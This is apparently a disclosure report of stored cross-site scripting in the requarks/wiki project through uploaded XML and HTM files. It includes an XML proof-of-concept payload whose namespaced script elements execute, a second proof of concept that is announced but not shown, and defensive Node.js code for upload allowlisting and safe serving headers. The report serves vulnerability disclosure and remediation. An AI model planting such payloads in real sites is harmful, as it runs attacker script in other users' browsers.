Cross-site Scripting (XSS) - Stored in requarks/wiki
Dec 20th 2021
Stored XSS can be performed by uploading malicious XML / HTM files. There is no check in place to prevent such files from being uploaded, and once stored they are served back to other users, so the script they contain runs in the browser of anyone who opens them.
Proof of Concept 1 (XML)
1: Upload the following file as payload.xml:

    <html>
      <head></head>
      <body>
        <something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
        <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(2)</a:script>
        <info>
          <name>
            <value><![CDATA[<script>confirm(document.domain)</script>]]></value>
          </name>
          <description>
            <value>Hello</value>
          </description>
          <url>
            <value>http://google.com</value>
          </url>
        </info>
      </body>
    </html>

When the browser renders this XML document, the script elements bound to the XHTML namespace (http://www.w3.org/1999/xhtml) are executed even though the root element is not XHTML, so alert(1) and alert(2) fire; the CDATA section inside <value> is only text and is displayed rather than run.
Proof of Concept 2 (HTM)
2: Upload the following file as payload.htm:
This vulnerability allows stored XSS via malicious XML / HTM files: any user who opens the uploaded file has the embedded script executed in their browser, in the wiki's origin.
Only allow image file uploads (png / jpg / webp / svg [sanitize this one properly; SVG can carry script!]).
If a filetype restriction is not an option, I strongly suggest you opt for the Content-Disposition method, as there are many other dangerous file types which can be uploaded. I recommend:
For select files (.png, .jpg, .svg (after sanitization), .pdf, .gif ... etc):
Use the Content-Disposition: inline header so that they can be viewed in the browser.
If the file extension does not match a safe file type:
Use the Content-Disposition: attachment header so that the file is downloaded to the user's computer instead of being rendered. In both cases send the correct Content-Type together with X-Content-Type-Options: nosniff, so the browser does not sniff an uploaded file into HTML.
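The two recommendations above, an upload allowlist and a Content-Disposition policy at serving time, as an added Node.js example. This is illustrative code written for this page, not Wiki.js's own upload handling; the function names (isUploadAllowed, matchesSignature, headersForDownload), the allowlist contents and the sample inputs are assumptions. It goes one step beyond the text by also checking the file's leading bytes, so that an HTML document renamed to payload.png is rejected as well as payload.htm.

```javascript
// Added example, not Wiki.js code: an upload allowlist plus a
// Content-Disposition policy for serving uploaded files.  The function names
// (isUploadAllowed, matchesSignature, headersForDownload) are illustrative.

// Extensions accepted at upload time.  svg is deliberately left out: it can
// carry <script>, so it must go through a sanitizer before it is allowed.
const UPLOAD_ALLOWLIST = new Set(['png', 'jpg', 'jpeg', 'gif', 'webp', 'pdf']);

// Types the browser may render inline.  Anything else is forced to download
// so that HTML, XML or unsanitized SVG never executes in the wiki's origin.
const INLINE_TYPES = {
  png: 'image/png',
  jpg: 'image/jpeg',
  jpeg: 'image/jpeg',
  gif: 'image/gif',
  webp: 'image/webp',
  pdf: 'application/pdf',
};

// Leading bytes ("magic numbers") of the allowed types.  Every check listed
// for a type must match.  This catches payload.png that is really an HTML
// document, which an extension-only check would accept.
const SIGNATURES = {
  png:  [{ at: 0, bytes: [0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a] }],
  jpg:  [{ at: 0, bytes: [0xff, 0xd8, 0xff] }],
  jpeg: [{ at: 0, bytes: [0xff, 0xd8, 0xff] }],
  gif:  [{ at: 0, bytes: [0x47, 0x49, 0x46, 0x38] }],                // "GIF8"
  webp: [{ at: 0, bytes: [0x52, 0x49, 0x46, 0x46] },                 // "RIFF"
         { at: 8, bytes: [0x57, 0x45, 0x42, 0x50] }],                // "WEBP"
  pdf:  [{ at: 0, bytes: [0x25, 0x50, 0x44, 0x46, 0x2d] }],          // "%PDF-"
};

function extensionOf(filename) {
  const m = /\.([A-Za-z0-9]+)$/.exec(filename);
  return m ? m[1].toLowerCase() : '';
}

function matchesSignature(bytes, ext) {
  const checks = SIGNATURES[ext];
  if (!checks) return false;
  return checks.every(({ at, bytes: sig }) =>
    sig.every((b, i) => bytes[at + i] === b));
}

// Upload-time check: the extension must be on the allowlist and the content
// must begin like the type that extension claims.
function isUploadAllowed(filename, bytes) {
  const ext = extensionOf(filename);
  return UPLOAD_ALLOWLIST.has(ext) && matchesSignature(bytes, ext);
}

// RFC 6266 value with an ASCII fallback and an RFC 5987 UTF-8 form, so a
// crafted filename cannot inject quotes or extra parameters into the header.
function dispositionValue(type, filename) {
  const ascii = filename.replace(/[^\x20-\x7e]/g, '_').replace(/["\\]/g, '_');
  return `${type}; filename="${ascii}"; filename*=UTF-8''${encodeURIComponent(filename)}`;
}

// Serving-time policy: inline only for known-safe types, attachment for
// everything else, and nosniff so the browser honours our Content-Type.
function headersForDownload(filename) {
  const ext = extensionOf(filename);
  const type = INLINE_TYPES[ext];
  return {
    'Content-Type': type || 'application/octet-stream',
    'Content-Disposition': dispositionValue(type ? 'inline' : 'attachment', filename),
    'X-Content-Type-Options': 'nosniff',
  };
}

// Constructed sample inputs: a PNG header, and an HTML payload like the one
// in the report, renamed to look like an image.
const samplePng = Uint8Array.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a, 0, 0, 0, 13]);
const sampleHtml = new TextEncoder().encode('<html><script>confirm(document.domain)</script></html>');

console.log(isUploadAllowed('logo.png', samplePng));      // true
console.log(isUploadAllowed('payload.png', sampleHtml));  // false: content is not a PNG
console.log(isUploadAllowed('payload.htm', sampleHtml));  // false: extension not allowed
console.log(headersForDownload('payload.xml'));           // attachment, octet-stream, nosniff
```

Both checks are needed: the allowlist stops payload.htm and payload.xml at upload time, and the serving-time headers make sure that anything which still reaches storage (for example through another upload path) is downloaded rather than rendered in the wiki's origin.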